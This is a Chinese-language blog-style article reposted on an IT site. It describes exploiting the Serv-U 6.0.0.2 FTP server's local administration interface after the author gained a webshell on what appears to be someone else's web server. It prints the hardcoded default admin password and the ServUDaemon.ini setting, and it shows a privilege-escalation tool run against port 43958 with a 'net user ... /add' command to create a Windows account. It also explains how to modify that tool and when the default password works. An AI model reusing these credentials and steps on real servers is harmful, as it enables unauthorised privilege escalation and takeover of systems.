首页  登陆  注册  博客集  下载频道  网络硬盘  学院论坛  家园
IT学院 网站地图 网站地图
收藏本站 收藏本站
高级搜索 高级搜索
 新闻IT新闻 互联网 微软 黑客新闻 网络网络协议 故障 网络管理 TCP/IP 无线技术 解决方案 黑客技术 漏洞 软件评测 安全资讯
 数据MSsql Oracle Mysql PL/SQL 备份 系统:Linux vista Windows FTP 防火墙 注册表 服务器行情 服务器应用 解决方案 WEB服务器
 墙纸风景壁纸 游戏壁纸 体育壁纸 汽车壁纸 人文壁纸 影视壁纸 广告壁纸 花卉壁纸 节日壁纸 动漫壁纸 明星壁纸 绘画壁纸 月历壁纸
当前位置: > 主页>服务器>服务器技术>FTP服务器>对Serv-U 6.0.0.2默认帐户及密码的理解
热门文章排行
  
热门文章排行 服务器应用:IIS建FTP服
服务器应用:用serv-u建
Exchange 2003,你真的
FTP服务器软件Serv-U教
充分利用 FTP分类账户设
Exchange 2000 Instant
Windows下用sftp巧妙打
新手入门:了解FTP服务
内网FTP服务器架设不完
Serv-U:快速构建功能强
精采文章推荐
  
精采文章推荐 Windows 下IIS配置与Ftp
用Gene6让FTP服务搭建平
服务器应用:IIS建FTP服
最新更新文章
  
最新更新文章 Windows 下IIS配置与Ftp
用Gene6让FTP服务搭建平
内网FTP服务器架设不完
Windows 2003 Server FT
Windows下用sftp巧妙打
Serv-U的安装和基本设置
Serv-U 3.0参数设置技巧
轻松架设Windows2003用
实战:全面保障FTP服务
对Serv-U 6.0.0.2默认帐

对Serv-U 6.0.0.2默认帐户及密码的理解

编辑:   来源:  日期:2008-02-04   我要投稿      家园
天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini
[GLOBAL]
Version=6.0.0.2
OpenFilesDownloadMode=Exclusive
PacketTimeOut=300
LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39

6.0.0.2版的.曾经看到哪说6.0版的默认本地管理帐号和密码依旧是原来那个.可又好像听谁说过6版的密码已经改了..

呵.这里发现.多出了一行Localsetuppassword.有种不详的预感.难道原来的默认密码已经通过它来设置了?加了MD5,算算纯数字倒还是可以.机会渺茫..

试试能不能写入...显示权限不足(一切都在预料之内).OK试试默认帐户和密码吧.

上传了xiaolu的那个serv-u权限提升工具

netstat -an |find "43958"
TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING

嗯,是这个口.

执行命令

D:/web/www/XXXX_com/serv-u.exe 43958 "net user xiaoqi amen. /add " 
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
#l@$ak#.lk;0@P
>530 Not logged in.
******************************************************

看到530,心凉了一下,这么说来默认密码被改了.
上群里想获得一下确认.Superhei给了个很好的思路.下载主程序用UEDIT查看密码.
serv-u 6.0版之前要修改默认密码也是同样的方法,而且密码长度要求同样要求是14位(用其他字符替换#l@$ak#.lk;0@P)..
打开ServUAdmin.exe查了下,发现密码依旧是#l@$ak#.lk;0@P(特地复制到记事本观察,防止0/O l/1等字符混淆).确实没有变.
那么,看来Serv-u已经不依靠它来验证了?
为了找出真像.下载了一个Serv-U 6.0.0.2版(未装汉化,未破解,防止低版本汉化及破解补丁)


之前就在想,为什么Serv-U不可以提供一个让管理员修改密码的地方了?多少个服务器OVER的责任在Serv-U上啊?
好!这次来了,刚打开serv-u admin,发现在"停止服务"下面多了一个"设置更改密码"的按钮.
再来看看ServUDaemon.ini,除了版本改变了以外,与原来并没有不同之处.
回到控制台点开"设置更改密码"要求输入旧密码,新密码,确认.旧密码?旧密码是什么?#l@$ak#.lk;0@P吗?
提示密码不正确..怪了.试了下空密码...正确..这可把我郁闷了.难道在Serv-U 6.0.0.2里LocalAdministrator的密码就是空???
把xiaolu的权限提升工具拿来改了下,把密码改成空.编译好重新传了上去.

执行命令

D:/web/www/XXXX_com/serv-u2.exe 43958 "net user xiaoqi amen. /add " 
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
>530 Not logged in.
******************************************************

依然是530.呵..真是在做梦啊我.不过这次失败并不能代表默认密码不为空(因为这台机器的配置文件中有LocalSetupPassword=)
好的.回过头,看了下我机器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看来确是刚才配置密码的MD5了.把我机器上Serv-u的密码改成空的(竟然允许我空的)再用这个serv-u2.exe试了下.不行..530,脑中突然闪过,难道"空"就是#l@$ak#.lk;0@P
操起serv-u.exe,yeah!成功.
到这里我们要开始怀疑一个问题了,如果修改了密码,那么就需要进行二次验证了?一次是#l@$ak#.lk;0@P 一次是修改完的密码.
呵..兴冲冲地跟superhei说了句"二次验证",修改了下那个权限提升工具,把其中的密码改为我在Serv-U中设置的密码,连上了.证明了没有进行二次验证.
总结一下,在Serv-U 6.0.0.2版本中,初始密码依旧是#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制台修改密码,修改完密码,配置保存在ServUDaemon.ini的LocalSetupPassword=中.
原来的#l@$ak#.lk;0@P依旧保存只有当密码为空时使用.

另:要修改本地管理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口号,既可

btw: 这些没有技术含量的东西,希望大家多多原谅,原本写的一些东西只是想丢在blog里自己安慰安慰,大家转载完实在是折煞我了


上一篇:ftp操作常识问题集锦  
下一篇:实战:全面保障FTP服务器的安全
 关键字:  
文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:

   文章评论:(0条)
  
 请留名: 匿名评论   点击查看所有评论
 

  责任编辑:IT学院  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。